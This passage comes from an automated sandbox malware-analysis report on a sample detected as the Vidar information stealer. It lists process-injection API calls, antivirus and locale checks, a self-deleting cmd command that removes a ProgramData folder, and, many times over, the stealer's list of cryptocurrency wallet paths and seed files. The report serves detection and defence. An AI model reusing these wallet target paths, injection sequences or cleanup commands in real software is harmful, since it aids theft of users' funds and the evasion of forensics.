                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_0002F54A
                              Searches for specific processes (likely to inject)
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000324A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000324A8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_0003257F
                              Source: C:\Users\user\Desktop\out.exeCode function: ??_U@YAPAXI@Z,OpenProcess,_memset,ReadProcessMemory,_memset,??_V@YAXPAX@Z, t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon0_2_0002FB2D
                              Source: C:\Users\user\Desktop\out.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exitJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002111D cpuid 0_2_0002111D
                              Source: C:\Users\user\Desktop\out.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00030DDB
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0004B0CC
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_0004B1C1
                              Source: C:\Users\user\Desktop\out.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00049A50
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_0004B268
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0004B2C3
                              Source: C:\Users\user\Desktop\out.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_0004AB40
                              Source: C:\Users\user\Desktop\out.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_000453E3
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_0004B494
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_0004749C
                              Source: C:\Users\user\Desktop\out.exeCode function: EnumSystemLocalesA,0_2_0004B556
                              Source: C:\Users\user\Desktop\out.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00049D6E
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_0004E56F
                              Source: C:\Users\user\Desktop\out.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00047576
                              Source: C:\Users\user\Desktop\out.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0004B580
                              Source: C:\Users\user\Desktop\out.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00048DC4
                              Source: C:\Users\user\Desktop\out.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0004B5E7
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_0004B623
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoA,0_2_0004E6A4
                              Source: C:\Users\user\Desktop\out.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\out.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,0_2_0003C0E9
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030C53 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00030C53
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00030D2E
                              Source: C:\Users\user\Desktop\out.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\out.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Vidar
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Yara detected Vidar stealer
                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 0.2.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: window-state.json
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local 